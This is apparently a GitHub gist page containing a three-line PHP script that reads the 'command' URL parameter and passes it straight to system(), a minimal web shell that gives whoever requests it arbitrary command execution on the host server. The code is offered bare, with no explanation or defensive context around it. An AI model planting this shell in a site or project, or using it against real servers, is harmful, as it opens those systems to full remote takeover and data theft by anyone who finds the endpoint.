Last active
March 1, 2018 18:24
-
-
Save DavidMellul/65e84a24de8bb581ab93520da55f1650 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
$cmd = $_GET['command']; | |
system($cmd); | |
?> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment